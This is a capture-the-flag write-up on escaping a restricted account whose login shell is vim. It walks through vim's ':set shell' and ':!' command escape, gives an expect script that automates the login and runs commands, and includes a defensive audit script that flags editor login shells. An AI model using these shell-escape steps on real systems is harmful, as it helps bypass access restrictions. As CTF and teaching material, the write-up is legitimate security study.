Description: sheep@pwn21.ddtek.biz:6000 sheep go baaAaaA
One could simply SSH to the server with:
    ssh -p 6000 sheep@pwn21.ddtek.biz # and use password baaAaaA

However, the server appeared to be overloaded and most of the time SSH did not work. The solution is to retry the SSH connection in a shell loop until it works:
    while true; do
      ssh -p6000 sheep@pwn21.ddtek.biz
    done

Once connected, you get a black screen with nothing on it, but you rapidly discover that you are in the VIM text editor.
To deal with the black screen where nothing is displayed, you could either:
- under Windows with PuTTY uncheck Window/Colours options
- select text and copy/paste it elsewhere, the content is here
- write some expect to automate the SSH connection and the sending of commands, so that the output of SSH can be piped
A few useful VIM commands:
    :q!         => quit
    :o          => open a file
    :!<command> => run command *in default shell*
We tried to list files with:
    :!ls

but it did not work. So we opened /etc/passwd with:

    :o /etc/passwd

and discovered that the default shell of the sheep user was /usr/bin/vim. Simply change it with:

    :set shell=/bin/bash
Then we were able to list files:
    :!ls

and view the key file:

    -rw-r-----. 1 root sheepy 13 May 22 00:01 key

Just open it with:

    :o key

and you get the key: SHis4pansies.
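A defender-side check for the misconfiguration this challenge relied on (an added example, not part of the original write-up): it scans passwd-format data for accounts whose login shell is an editor or pager with a built-in command escape. The program list, the function names and the sample entries are assumptions constructed for illustration.

```shell
#!/bin/sh
# Flag accounts whose login shell is an interactive program with a built-in
# command escape, as /usr/bin/vim was for the sheep account.
# The program list below is an assumption; extend it for your environment.

# Print a reason and return 0 if the given login shell offers a command escape.
shell_escape_risk() {
    case "${1##*/}" in
        vi|vim|view|ex|nvim) echo "editor: :!cmd and :set shell=" ;;
        ed)                  echo "editor: !cmd" ;;
        emacs)               echo "editor: M-x shell" ;;
        less|more)           echo "pager: !cmd" ;;
        *)                   return 1 ;;
    esac
}

# Read passwd(5)-format lines on stdin; print "user<TAB>shell<TAB>reason".
audit_login_shells() {
    while IFS=: read -r user pw uid gid gecos home shell; do
        case "$user" in ''|\#*) continue ;; esac   # skip blanks and comments
        [ -n "$shell" ] || continue                # empty field: system default
        reason=$(shell_escape_risk "$shell") || continue
        printf '%s\t%s\t%s\n' "$user" "$shell" "$reason"
    done
}

# Constructed sample data; only the sheep entry's shell comes from the page.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
sheep:x:1001:1001::/home/sheep:/usr/bin/vim
pager:x:1002:1002::/home/pager:/usr/bin/less
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
# comment line
alice:x:1003:1003::/home/alice:/bin/sh'

printf '%s\n' "$SAMPLE_PASSWD" | audit_login_shells
# On a real host: audit_login_shells < /etc/passwd
```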
At the same time, I was doing some expect & shell to get the key. Expect comes in very handy when you want to automate things or when you want to get the output of an interactive program such as ssh. Let me show you this solution as a small introduction to expect.
The expect script:
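    $ cat ssh-cmd.expect
    #!/usr/bin/expect -f
    # the command to run is the first script argument
    set cmd [lindex $argv 0]
    spawn ssh -p 6000 sheep@pwn21.ddtek.biz
    # wait for the password prompt, then answer it
    expect "*?assword:*"
    send -- "baaAaaA\r"
    # give vim time to start
    sleep 1
    # vim is the login shell: set a real shell, run the command, quit
    send -- ":set shell=/bin/sh\r"
    send -- ":!$cmd\r"
    send -- ":q!\r"
    expect eof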
The shell script that runs expect and filters the output for us:
    $ cat ssh-cmd.sh
    #!/bin/sh
    # remove these annoying [ terminal color codes
    ./ssh-cmd.expect "$*" | strings | grep -v '^\['
List files:
    $ ./ssh-cmd.sh ls -l
    spawn ssh -p 6000 sheep@pwn21.ddtek.biz
    sheep@pwn21.ddtek.biz's password:
    Last login: Sat May 22 05:34:03 2010 from x
    total 4
    -rw-r-----. 1 root sheepy 13 May 22 00:01 key
    Press ENTER or type command to continue
    Connection to pwn21.ddtek.biz closed.
Cat the key:
    $ ./ssh-cmd.sh cat key
    spawn ssh -p 6000 sheep@pwn21.ddtek.biz
    sheep@pwn21.ddtek.biz's password:
    Last login: Sat May 22 05:34:18 2010 from x
    SHis4pansies
    Press ENTER or type command to continue
    Connection to pwn21.ddtek.biz closed.
Done!
Really interesting, the extra bit on expect, thank you!